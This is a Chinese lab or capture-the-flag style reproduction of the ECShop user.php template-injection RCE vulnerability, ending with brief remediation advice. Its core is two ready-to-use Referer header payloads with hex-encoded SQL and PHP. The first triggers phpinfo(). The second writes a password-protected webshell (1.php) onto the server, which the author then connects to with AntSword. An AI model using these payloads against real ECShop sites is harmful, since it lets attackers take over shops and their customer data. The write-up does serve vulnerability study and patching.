Ecshop3.x漏洞复现
漏洞概述:
ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行。攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重。
影响范围:
ECShop全系列版本,包括2.x,3.0.x,3.6.x等。
环境搭建:
本次环境采用安鸾渗透平台环境 地址
漏洞复现:
访问url,看到首页
访问robots.txt文件,看到下面有路径,访问之后也没有发现可利用的漏洞
百度搜索Ecshop历史漏洞
发现uesr.php网页下Referer存在代码注入
由于_echash是固定的,不是随机生成的。(2.7版本的_echash值为554fcae493e564ee0dc75bdf2ebf94ca 而3.x版本的 _echash 值为 45ea207d7a2b68c49582d2d22adf953 所以说可控
对注入语句进行16进制编码
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
发现得到回显
制造webshell木马 1.php 密码为 1337
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:289:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
返回200上传成功
访问1.php
发现没有回显,说明上传成功
蚁剑进行连接
在根目录下得到flag
漏洞修复:
目前ecshop官方并没有升级任何版本,也没有告知漏洞补丁,建议各位网站的运营者对网站配置目录下的lib_insert.php里的id以及num的数据转换成整数型,或者是将网站的user.php改名,停止用户管理中心的登录,或者找专业的网站安全公司去修复漏洞补丁,做好网站安全检测与部署。对网站的images目录写入进行关闭,取消images的php脚步执行权限